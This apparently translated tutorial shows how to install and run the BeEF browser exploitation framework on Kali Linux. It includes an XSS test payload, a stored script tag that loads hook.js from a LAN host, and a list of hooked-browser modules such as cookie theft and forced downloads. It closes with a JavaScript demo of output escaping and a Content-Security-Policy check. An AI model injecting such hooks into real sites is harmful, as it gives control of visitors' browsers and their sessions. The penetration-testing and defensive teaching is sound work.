[Kali Linux] beef-xss attack example
About beef-xss
BeEF is short for "Browser Exploitation Framework". It is a penetration testing tool that focuses on the web browser.
BeEF lets professional penetration testers assess the real security posture of a target environment using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client systems and examines exploitability in the one doorway that is always open: the web browser. BeEF hooks one or more web browsers and uses them as a beachhead for launching targeted command modules and for further attacks against the system from within the browser context.
1. Install beef-xss
apt-get install beef-xss
Setting up ruby-http-parser (1.2.1-3) …
Setting up ruby-http-cookie (1.0.3-1) …
Setting up ruby-rest-client (2.0.2-3.1) …
Setting up ruby-rushover (0.3.0-2) …
Setting up ruby-execjs (2.6.0-1) …
Setting up ruby-http (4.4.1-4) …
Setting up ruby-mojo-magick (0.5.6-2) …
Setting up imagemagick (8:6.9.10.23+dfsg-2.1+b2) …
Setting up ruby-uglifier (2.7.2+dfsg-2) …
Setting up ruby-qr4r (0.4.1-1) …
Setting up ruby-twitter (7.0.0-1) …
Setting up beef-xss (0.5.0.0+git20191218-0kali2) …
beef-xss.service is a disabled or a static unit, not starting it.
Processing triggers for kali-menu (2020.1.7) …
Processing triggers for desktop-file-utils (0.24-1) …
Processing triggers for mime-support (3.64) …
Processing triggers for initramfs-tools (0.135+kali1) …
update-initramfs: Generating /boot/initrd.img-5.4.0-kali3-amd64
Processing triggers for hicolor-icon-theme (0.17-2) …
Processing triggers for libc-bin (2.29-9) …
Processing triggers for systemd (244-3) …
Processing triggers for man-db (2.9.0-2) …
Processing triggers for fontconfig (2.13.1-2+b1) …
Output like the above in the console means the installation succeeded.
Basic usage of beef-xss
1. Start beef-xss
aaa@qq.com:/usr/share# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - beef-xss
Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
Active: active (running) since Sun 2020-08-09 03:30:52 EDT; 5s ago
Main PID: 11463 (ruby)
Tasks: 2 (limit: 2333)
Memory: 49.8M
CGroup: /system.slice/beef-xss.service
└─11463 ruby /usr/share/beef-xss/beef
Aug 09 03:30:52 kali systemd[1]: Started beef-xss.
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...
Output like the above means the service started successfully. It is reached by entering http://127.0.0.1:3000/ui/panel in a browser; during startup you are prompted to set a password for the beef account.
So how do you tell whether a page has an XSS injection point? Below is a simple page with no XSS defences at all: the text box applies no filtering. Enter "><script>alert('XSS');</script> into the text box.
If the JS executes and an alert box pops up, the page can be attacked with XSS.
Now enter <script src="http://192.168.31.188:3000/hook.js"></script> into the text box.
Note the IP: I am testing locally here, so it is my own machine's IP. If the value is stored successfully, the script fires when the list page is rendered and requests hook.js, as shown below.
At that point a machine comes online in the BeEF console. Console overview:
Hooked Browsers
- Online Browsers: browsers currently hooked and online
- Offline Browsers: browsers that were hooked but are now offline
Details
- browser and plugin version information, operating system information
Logs
- browser actions: focus changes, mouse clicks, text input
Commands
- Green module: the module works against the current browser and its execution is invisible to the user
- Red module: the module does not work against the current browser (some red modules can still be executed)
- Orange module: the module works, but the result is visible to the user
- Grey module: the module has not yet been tested against the target browser
2. Simple tests
2.1 Send the target an alert box
2.2 A prompt box that accepts input
2.3 Redirect the page
2.4 Play a piece of music
2.5 Obtain the target's cookies
2.6 Make the target download a file
Of course there are many more powerful features, such as network scanning and geolocation, which I will not cover here. The overall point is to show how dangerous XSS is, and that it must be defended against during development.
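As an added example (not code from the original post or from the BeEF project), here is the defence the previous sentence calls for: the comment list from the vulnerable page rendered once without and once with HTML output encoding, using the two payloads shown above as the stored input, followed by a Content-Security-Policy check that refuses a script loaded from another origin. The stored comments, the page origin http://app.example and all function names are assumptions made for this example.

```javascript
// Added example (not from the original post): the stored-XSS flaw the post
// demonstrates, beside two defences: HTML output encoding and a
// Content-Security-Policy that only allows scripts from the page's own origin.
// The comment rows, the page origin and the helper names are constructed here;
// the two payload strings are the ones the post types into the text box.

// Constructed "database rows": what the unfiltered text box let someone store.
const storedComments = [
  { user: "alice", text: "Nice article!" },
  { user: "mallory", text: "\"><script>alert('XSS');</script>" },
  { user: "mallory", text: '<script src="http://192.168.31.188:3000/hook.js"></script>' },
];

// Vulnerable renderer: stored text is concatenated straight into the HTML, so
// a stored <script> tag runs in every visitor's browser when the list renders.
function renderCommentsUnsafe(comments) {
  return comments
    .map((c) => `<li><input value="${c.text}"> by ${c.user}</li>`)
    .join("\n");
}

// HTML-encode the five characters that can break out of an HTML context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: every untrusted value is encoded for the context it lands
// in (an attribute value and an element body here), so the payloads become text.
function renderCommentsSafe(comments) {
  return comments
    .map((c) => `<li><input value="${escapeHtml(c.text)}"> by ${escapeHtml(c.user)}</li>`)
    .join("\n");
}

// Rough check: does the generated markup still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Second layer: a CSP with no 'unsafe-inline' and no foreign origins, so a hook
// script fetched from another host is refused by the browser even if encoding
// was forgotten somewhere in the application.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'";

// Minimal evaluator for script-src: true if a script at scriptUrl would be
// permitted on a page served from pageOrigin. Handles 'self', 'none' and exact
// origin sources only; it is not a full CSP parser.
function cspAllowsScript(cspHeader, pageOrigin, scriptUrl) {
  const directives = Object.fromEntries(
    cspHeader
      .split(";")
      .map((d) => d.trim().split(/\s+/))
      .filter((parts) => parts[0])
      .map(([name, ...sources]) => [name, sources])
  );
  const sources = directives["script-src"] || directives["default-src"] || [];
  if (sources.includes("'none'")) return false;
  const scriptOrigin = new URL(scriptUrl).origin;
  return sources.some(
    (src) => (src === "'self'" && scriptOrigin === pageOrigin) || src === scriptOrigin
  );
}

// Stand-alone run: show both renderings and the two CSP decisions.
console.log("unsafe:\n" + renderCommentsUnsafe(storedComments));
console.log("safe:\n" + renderCommentsSafe(storedComments));
console.log("hook allowed by CSP:",
  cspAllowsScript(CSP_HEADER, "http://app.example", "http://192.168.31.188:3000/hook.js"));
console.log("own script allowed by CSP:",
  cspAllowsScript(CSP_HEADER, "http://app.example", "http://app.example/static/app.js"));
```

Output encoding is the fix that actually removes the injection point; the CSP is defence in depth, and it only helps against the hook-loading payload if the policy neither lists the attacker's origin nor allows inline scripts.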
Reference: beef-xss official documentation